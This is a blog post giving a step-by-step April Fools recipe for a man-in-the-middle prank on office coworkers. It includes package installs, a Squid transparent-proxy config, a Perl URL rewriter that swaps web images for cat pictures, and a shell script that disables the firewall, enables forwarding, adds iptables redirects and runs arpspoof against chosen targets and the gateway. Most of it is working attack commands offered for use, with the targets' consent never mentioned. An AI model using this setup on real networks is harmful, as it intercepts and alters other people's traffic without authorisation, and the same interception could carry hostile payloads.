Aprils Fools 2017 is fast approaching.. let's have some fun.

Hacker Cats

For this years April fools joke I decided to have a little fun in the office, and do a little Man-In-the-Middle attack replacing all the images with Cats (since most of the code was already out there but outdated and not currently working.. I decided to give it a refresh)

Equipment needed:
  • Raspberry Pi or other Linux PC (I'm using Ubuntu 16.04 on a notebook)
  • SQUID Proxy (version 3.5.12).
  • IPTables for NAT/Redirect to the
  • arpspoof (version 2.4)
  • A sense of Humour

Installation:

install the required software

    sudo apt-get update
    sudo apt-get -y install iptables
    sudo apt-get -y install squid   (Use squid3 for raspbian)
    sudo apt-get -y install dsniff
Configure squid

Note if you have installed squid3 vs squid, you will need to substitute squid3 in various places (config files, log files, systemctl commands etc)

  sudo cp /etc/squid/squid.conf /etc/squid/squid_orig.conf
  sudo vi /etc/squid/squid.conf

contents of /etc/squid/squid.conf: version 3.5.X

url_rewrite_program /usr/local/bin/cats.pl  
acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 ::1  
acl localnet src 192.168.1.0/24 # RFC1918 possible internal network  
acl SSL_ports port 443  
acl Safe_ports port 80 # http  
acl Safe_ports port 21 # ftp  
acl Safe_ports port 443 # https  
acl Safe_ports port 70 # gopher  
acl Safe_ports port 210 # wais  
acl Safe_ports port 1025-65535 # unregistered ports  
acl Safe_ports port 280 # http-mgmt  
acl Safe_ports port 488 # gss-http  
acl Safe_ports port 591 # filemaker  
acl Safe_ports port 777 # multiling http  
acl CONNECT method CONNECT  
http_access deny !Safe_ports  
http_access deny CONNECT !SSL_ports  
http_access allow localhost manager  
http_access deny manager  
http_access allow localhost  
http_access allow localnet  
http_access deny all  
http_port 3128 transparent  
refresh_pattern ^ftp: 1440 20% 10080  
refresh_pattern ^gopher: 1440 0% 1440  
refresh_pattern -i (/cgi-bin/|\?) 0 0% 0  
refresh_pattern (Release|Packages(.gz)*)$ 0 20% 2880  
refresh_pattern . 0 20% 4320  

Note: Set the IP address of your local network

For Raspbian on Squid3 I had to use the following http_port lines

http_port 8080  
http_port 3128 intercept  
Cats Re-Writer

create your cats rewriter in /usr/local/bin/cats.pl

sudo vi /usr/local/bin/cats.pl  
sudo chmod 755 /usr/local/bin/cats.pl  

Contents of /usr/local/bin/cats.pl

#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;

open (DEBUG, '>>/tmp/cats.log');  
autoflush DEBUG 1;

print DEBUG "########################################################################\n";

while (<>) {  
  my @inputs=split / /;
  chomp($inputs[0]);
  chomp $_;

  if ($inputs[0] =~ /.*media\.tumblr\.com\/tumblr_.*/i) {
  print DEBUG "Input NOSQUID: $url\n";
  print "\n";
  print DEBUG "Output NOSQUID: $_\n";
  }
  elsif ($inputs[0] =~ /(.*\.jpg)/i) {
  $url = $1;
  print DEBUG "Input: $url -> http://thecatapi.com/api/images/get?format=src&type=jpg&nosquid\n";
  print "http://thecatapi.com/api/images/get?format=src&type=jpg&nosquid\n";
  }
  elsif ($inputs[0] =~ /(.*\.gif)/i) {
  $url = $1;
  print DEBUG "Input: $url -> http://thecatapi.com/api/images/get?format=src&type=gif&nosquid\n";
  print "http://thecatapi.com/api/images/get?format=src&type=gif&nosquid\n";
  }
  elsif ($inputs[0] =~ /(.*\.png)/i) {
  $url = $1;
  print DEBUG "Input: $url -> http://thecatapi.com/api/images/get?format=src&type=png&nosquid\n";
  print "http://thecatapi.com/api/images/get?format=src&type=png&nosquid\n";
  }
  elsif ($inputs[0] =~ /(.*\.jpeg)/i) {
  $url = $1;
  print DEBUG "Input: $url -> http://thecatapi.com/api/images/get?format=src&type=jpeg&nosquid\n";
  print "http://thecatapi.com/api/images/get?format=src&type=jpeg&nosquid\n";
  }
  else {
  print "\n";
  }
  $count++;
}
close DEBUG;  

Running Squid

systemctl restart squid  

Check /var/log/squid/cache.log for any unexpected errors

Script the Attack

vi  start.sh  
#!/bin/sh
#--optional if you are using UFW
echo "Disabling Firewall"  
ufw disable  
#--optional if you are using Apache
echo "Stopping Apache"  
sudo systemctl stop apache2  
echo "Enabling NAT"  
echo 1 > /proc/sys/net/ipv4/ip_forward  
echo "Flushing Firewall"  
iptables -F  
echo "Setting Proxy Intercept"  
iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner proxy --dport 80 -j REDIRECT --to-port 3128

#arpspoof -i eth0 192.168.1.1   # arp the whole network according to the man pages, but I've never been able to get this to work for a whole network

echo "Starting Arp Spoofing"  
arpspoof \  
-t (YOUR TARGET) \
-t (YOUR TARGET) \
-i eth0 (YOUR GATEWAY IP)
#arpspoof will continue to run until control-c is pressed cancelling the spoofing
sleep 15  
echo "Flushing Firewall"  
iptables -F  
echo "Disabling NAT"  
echo 0 > /proc/sys/net/ipv4/ip_forward  
echo "Enabling UFW"  
ufw enable  
sudo systemctl start apache2  
# Note..  sometimes I have noticed a problem where it does not remove the NAT rule, and the machine needs to be rebooted..

Note: for Raspbian I had to use the following NAT rule

iptables -A PREROUTING -t nat -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 3128

Diagnosing problems

After going through several blogs on various ways to get this working there are slight nuances between ubuntu and raspbian , as well as NAT and Squid versions.. here are the steps I usually go through to resolve problems

1) Get the base SQUID proxy with defaults working (use proxy config in browser setup to test)  
2) resolve ACL issues with Squid config  
3) resolve "transparent" vs not issue with Squid  (Disable it for direct browser testing)  if you get an unexpected "Access Denied" try turning off transparent mode. you can also try "intercept" rather than "transparent"  
4) enable and diag cats.pl  
5) resolve NAT / redirect issues  
6) test arp poisioning

Note: you usually have to enable/test the transparent/NAT/ARP all at the same time
Darryl Burke

Darryl Burke

Over 25 years of Information Technology, Security, Hardware and Software architecture leadership, focusing on complex systems integration and mission critical applications.

The great white north http://www.burke-consulting.net